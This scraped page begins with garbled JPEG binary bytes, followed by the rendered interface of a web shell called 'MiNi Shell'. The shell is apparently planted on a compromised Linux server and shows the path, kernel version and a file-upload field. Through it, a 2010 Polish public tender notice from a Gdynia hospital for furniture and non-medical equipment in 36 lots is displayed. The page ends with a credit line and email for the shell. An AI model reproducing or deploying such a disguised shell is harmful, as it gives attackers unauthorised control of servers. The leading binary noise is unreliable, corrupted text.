JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20101011/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20101011/281865-N-2010.html

<p class="kh_header"><b>Gdynia: dostawa fabrycznie nowego sprzętu i wyposażenia niemedycznego oraz mebli dla Szpitala Miejskiego im. J. Brudzińskiego w Gdyni oraz Pomorskiego Centrum Traumatologii Wojewódzkiego Szpitala Specjalistycznego im. M. Kopernika w Gdańsku, znak SM/ZP/N/65/10-DO.</b><br>
<b>Numer ogłoszenia: 281865 - 2010; data zamieszczenia: 11.10.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> SP ZOZ Szpital Miejski im. J. Brudzińskiego , ul. Wójta Radtkego 1, 81-348 Gdynia, woj. pomorskie, tel. 058 6207501, faks 058 6201114.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http://www.szpitalmiejski-gdynia.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> dostawa fabrycznie nowego sprzętu i wyposażenia niemedycznego oraz mebli dla Szpitala Miejskiego im. J. Brudzińskiego w Gdyni oraz Pomorskiego Centrum Traumatologii Wojewódzkiego Szpitala Specjalistycznego im. M. Kopernika w Gdańsku, znak SM/ZP/N/65/10-DO..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia  jest:
1) dostawa fabrycznie nowego sprzętu i wyposażenia niemedycznego oraz mebli dla partnerów projektu: Szpitala Miejskiego im. J. Brudzińskiego w Gdyni oraz Pomorskiego Centrum Traumatologii Wojewódzkiego Szpitala Specjalistycznego im. M. Kopernika w Gdańsku, w ramach projektu partnerskiego Modernizacja i wyposażenie oddziałów udarowych i rehabilitacji neurologicznej oraz realizacja zadań profilaktyczno- szkoleniowych dla trzech szpitali woj. pomorskiego: w Gdańsku, Gdyni i Słupsku, współfinansowanego z Europejskiego Funduszu Rozwoju Regionalnego w ramach Regionalnego Programu Operacyjnego Województwa Pomorskiego 2007-2013, 
2) dostawa mebli i wyposażenia niemedycznego dla Szpitala Miejskiego im. J. Brudzińskiego w Gdyni, wynikającego z projektu budowlanego : Modernizacja i wyposażenie oddziałów udarowych i rehabilitacji neurologicznej oraz realizacja zadań profilaktyczno- szkoleniowych dla trzech szpitali woj. pomorskiego: w Gdańsku, Gdyni i Słupsku, współfinansowanego z Europejskiego Funduszu Rozwoju Regionalnego w ramach Regionalnego Programu Operacyjnego Województwa Pomorskiego 2007-2013, 
3) dostawa pozostałego fabrycznie nowego sprzętu, mebli i wyposażenia dla Szpitala Miejskiego im. J. Brudzińskiego w Gdyni
2. Przedmiot zamówienia, o którym mowa w ust. 1 dzieli się na 36 pakietów (części), w tym:
Pakiety dla Szpitala Miejskiego im. J. Brudzińskiego - od 1-6 oraz 11-36.
Pakiety dla Pomorskiego Centrum Traumatologii Wojewódzkiego Szpitala Specjalistycznego im. M. Kopernika w Gdańsku - od 7-10.
1.	pakiet 1
1. 1. wózek do brudnej bielizny - 1 szt.
1. 2. wózek do czystej bielizny- 1 szt. 
1. 3. wózek do dystrybucji leków - 1 szt.
1. 4. wózek zabiegowo-opatrunkowy - 1 szt. 
2.	pakiet 2
2. 1. wózek do mycia chorych ze sterowaniem hydraulicznym -1 szt. 
2. 2. wózek do przewożenia chorych w poz. leżącej -2 szt. 
2. 3. wózek inwalidzki dla chorych z hemiplegią  -2 szt.
2. 4. : wózek inwalidzki pokojowy -12 szt.
2. 5. : wózek inwalidzki toaletowy -1 szt.
2. 6. : wózek inwalidzki ze stabilizacją pleców i głowy -4 szt.
3.	pakiet 3. chłodziarka laboratoryjno-medyczna jednoskrzydłowa ze szklanymi drzwiami - 2 szt. 
4.	pakiet 4. myjnia dezynfektor do basenów -1 szt. 
5.	pakiet 5. zestaw (stanowisko) do ćwiczeń manipulacyjnych - 1 szt. 
6.	pakiet 6
6. 1. fotel tapicerowany  -2 szt. 
6. 2. kanapa rozkładana -1 szt.
6. 3. krzesło obrotowe z oparciem na ręce -10 szt.
6. 4. taboret obrotowy -4 szt. 
6. 5. fotele wypoczynkowe -2 szt. 
7.	pakiet 7
7. 1. Rolety  -32 szt.
7. 2. Zasłony prysznicowe z obręczami -6 szt. 
8.	pakiet 8
8. 1. Szkielet miniaturowy - model z zaznaczonymi przyczepami mięśni -1 szt. 
8. 2. Tablice anatomiczo - dydaktyczne: mózg, szkielet, system nerwowy, układ mięśniowy człowieka -2 szt. 
9.	pakiet 9
9. 1. Zestaw (stanowisko)  ćwiczeń manipulacyjnych -2 szt. 
9. 2. Zestaw (stanowisko)  ćwiczeń manipulacyjnych -2 szt. 
10.	PAKIET 10. Chłodziarka laboratoryjno-medyczna jednoskrzydłowa ze szklanymi drzwiami -5 szt. 
11.	pakiet 11
11.1.  Blat laminowany (BL) -1 szt. 
11.2.  Regał stalowy (R1) -1 szt. 
11.3.  Regał biurowy (R4) -3 szt. 
11.4.  Regał biurowy (R5) -2 szt. 
11.5.  Stół kuchenny (Sk)-1 szt. 
11.6.  Stolik okolicznościowy (So)-3 szt. 
11.7.  Szafka pod blat (Szb1) -1 szt. 
11.8.  Szafka pod zlewozmywak (Szb3) -1 szt. 
11.9.  Szafka na bieliznę czystą (Szc)  -2 szt. 
11.10 Szafka wisząca (Szw1) -2 szt. 
11.11 Szafka (Szw2) -2 szt. 
12.	pakiet 12
12.1. Taboret (T) -18 szt. 
12.2. fotel tapicerowany (f) -2 szt. 
12.3. Krzesło twarde (K1) -1 szt. 
12.4. Krzesło tapicerowane (K2) -14 szt. 
13.	PAKIET 13. Lodówka (L) 1 szt. 
14.	PAKIET 14. Pojemnik na odpady medyczne (Pm) -2 szt. 
15.	PAKIET 15. Stojak-worek na brudną bieliznę -1 szt. 
16.	PAKIET 16. Stolik zabiegowy (Sz)-1 szt. 
17.	PAKIET 17. Zestaw umywalkowy (U) - lustro -17 szt. 
18.	PAKIET 18. Zestaw umywalkowy (U) - Dozownik na mydło-17 szt. 
19.	PAKIET 19. Zestaw umywalkowy (U) - Pojemnik na ręczniki papierowe jednorazowe-17 szt.  
20.	PAKIET 20. Zestaw umywalkowy (U) - Kosz pedałowy -29 szt.
21.	PAKIET 21. Zestaw umywalkowy (U) - Wieszak na ręczniki -10 szt. 
22.	PAKIET 22. Zestaw umywalkowy (U) - Dozownik na środki dezynfekcyjne  - 17 szt. 
23.	PAKIET 23. Suszarka do rąk-5 szt. 
24.	PAKIET 24. : Pojemnik na papier toaletowy-4 szt. 
25.	PAKIET 25. : Wieszak ubraniowy -4 szt. 
26.	PAKIET 26
26.1. Żaluzje pionowe do pomieszczenia nr: 28 - gabinet ordynatora 1 szt. 
26.2. Żaluzje pionowe do pomieszczenia nr: 29 - gabinet lekarski 1 szt. 
26.3. Żaluzje pionowe do pomieszczenia nr: 26 ?- sekretariat 1 szt. 
26.4. Żaluzje pionowe do pomieszczenia nr: 21 - gabinet logopedy, psychologa 1 szt. 
26.5. Żaluzje pionowe do pomieszczenia nr: 17 - gabinet pielęgniarski 1 szt. 
26.6. Żaluzje pionowe do pomieszczenia nr: 15 - gabinet socjalny 1 szt.
26.7. Żaluzje pionowe do pomieszczenia nr: 11 - sala chorych 1 szt. 
26.8. Żaluzje pionowe do pomieszczenia nr: 9 - sala chorych 1 szt. 
26.9. Żaluzje pionowe do pomieszczenia nr: 5 - sala chorych 3 szt. 
26.10. Żaluzje pionowe do pomieszczenia nr: 4 - sala chorych 1 szt. 
26.11. Żaluzje pionowe do pomieszczenia nr: 3 - sala chorych 2 szt. 
26.12. Żaluzje poziome do pomieszczenia 27  łazienki dla personelu 1 szt. 
26.13. Roleta zmywalna do pomieszczenia 19 - gabinet zabiegowy 3 szt. 
26.14. Roleta wodoodporna do pomieszczenia: 14 - łazienka pacjentów 1 szt. 
26.15. Roleta wodoodporna do pomieszczenia: 13 - łazienka pacjentów 1 szt. 
26.16. Roleta wodoodporna do pomieszczenia: 12 - łazienka pacjentów 1 szt. 
27. Pakiet 27. Krzesło obrotowe - szt. 5
28. Pakiet 28. Myjka ultradźwiękowa - 1 szt. 
29. Pakiet 29.  Pulsoksymetr - 4 szt.   
30. Pakiet 30.  Zgrzewarka do opakowań sterylizacyjnych - 2 szt. 
31. Pakiet 31
31.1. Kołdry powietrzne 1 komplet - 10 szt.		
31.2. Kołdry powietrzne 1 komplet -10 szt.		
31.3. Dmuchawa do kołder powietrznych - 1 szt.
31.4. Wózek ( stojak na kółkach ) z miejscem na kołdry ( opcjonalnie ) - 2 szt. 
32. Pakiet 32 Zestaw do ogrzewania płynów infuzyjnych - 10 szt. ( 1 komplet )	 
33. Pakiet 33 Fotel  rozkładany - 3  szt.		
34. Pakiet 34 Stół -1 szt.				
35. Pakiet 35 Krzesło  szt. - 4       			
36. Pakiet 36 Stolik pod komputer - 1 szt..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 33.19.30.00-9, 39.10.00.00-3, 39.15.00.00-8, 39.71.11.30-9, 39.83.17.00-3, 39.51.50.00-5.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 36.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 21.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie dokonuje uszczegółowienia warunku
Ocena spełniania warunku udziału w postępowaniu nastąpi na podstawie oświadczenia przedłożonego przez wykonawcę wraz z ofertą</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie dokonuje uszczegółowienia warunku
Ocena spełniania warunku udziału w postępowaniu nastąpi na podstawie oświadczenia przedłożonego przez wykonawcę wraz z ofertą</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie dokonuje uszczegółowienia warunku
Ocena spełniania warunku udziału w postępowaniu nastąpi na podstawie oświadczenia przedłożonego przez wykonawcę wraz z ofertą</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie dokonuje uszczegółowienia warunku
Ocena spełniania warunku udziału w postępowaniu nastąpi na podstawie oświadczenia przedłożonego przez wykonawcę wraz z ofertą</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zmiany zawartej umowy będą wymagały pisemnego aneksu, w zakresie ustalonym w załączonym do SIWZ wzorze umowy. Istotne zmiany umowy w stosunku do treści oferty na podstawie której wyłoniono wykonawcę, mogą dotyczyć:
1)	terminu realizacji zamówienia
2)	warunków płatności
3)	zmiany wynagrodzenia w przypadku zmiany ustawowej stawki podatku VAT
4)	zmiany modelu oferowanego sprzętu w przypadku wycofania z produkcji i zastąpienia go modelem nowszym, pod warunkiem zachowania ceny wskazanej w ofercie, na podstawie której wyłoniono wykonawcę
Zmiany, o których mowa powyżej mogą być dokonane w następujących przypadkach:
	1) z powodu uzasadnionych zmian w zakresie sposobu wykonania przedmiotu zamówienia proponowanych przez Zamawiającego lub Wykonawcę, jeżeli te zmiany są korzystne dla Zamawiającego,
	2) wystąpienia zdarzeń losowych mających charakter siły wyższej, które uzasadniają wprowadzenie zmian do umowy
3) w razie ustawowej zmiany stawki podatku od towarów i usług (VAT),
4) w przypadku zmiany obowiązujących przepisów prawa w zakresie dotyczącym przedmiotu umowy, wymagających dostosowania się zamawiającego lub wykonawcy do wprowadzonych zmian,
5) w przypadkach określonych we wzorze umowy,
6) w przypadku przedłużającej się procedury udzielenia zamówienia publicznego,
7) w przypadku wystąpienia po stronie Zamawiającego okoliczności powodujących zmianę terminu wykonania zamówienia.
Strona wnioskująca o zmianę umowy, przedkłada drugiej stronie pisemne uzasadnienie konieczności wprowadzenia zmian do umowy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.szpitalmiejski-gdynia.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> j.w. lub: w siedzibie Szpitala Miejskiego im. J. Brudzińskiego, ul. Wójta Radtkego 1, 81-348 Gdynia, Dział ds. zamówień publicznych, pok. nr 11 budynek gospodarczy..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 22.10.2010 godzina 10:00, miejsce: w siedzibie Szpitala Miejskiego im. J. Brudzińskiego, ul. Wójta Radtkego 1, 81-348 Gdynia, Dział ds. zamówień publicznych, pok. nr 11 budynek gospodarczy.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> projekt partnerski Modernizacja i wyposażenie oddziałów udarowych i rehabilitacji neurologicznej oraz realizacja zadań profilaktyczno- szkoleniowych dla trzech szpitali woj. pomorskiego: w Gdańsku, Gdyni i Słupsku, współfinansowany z Europejskiego Funduszu Rozwoju Regionalnego w ramach Regionalnego Programu Operacyjnego Województwa Pomorskiego 2007-2013.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> tak</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com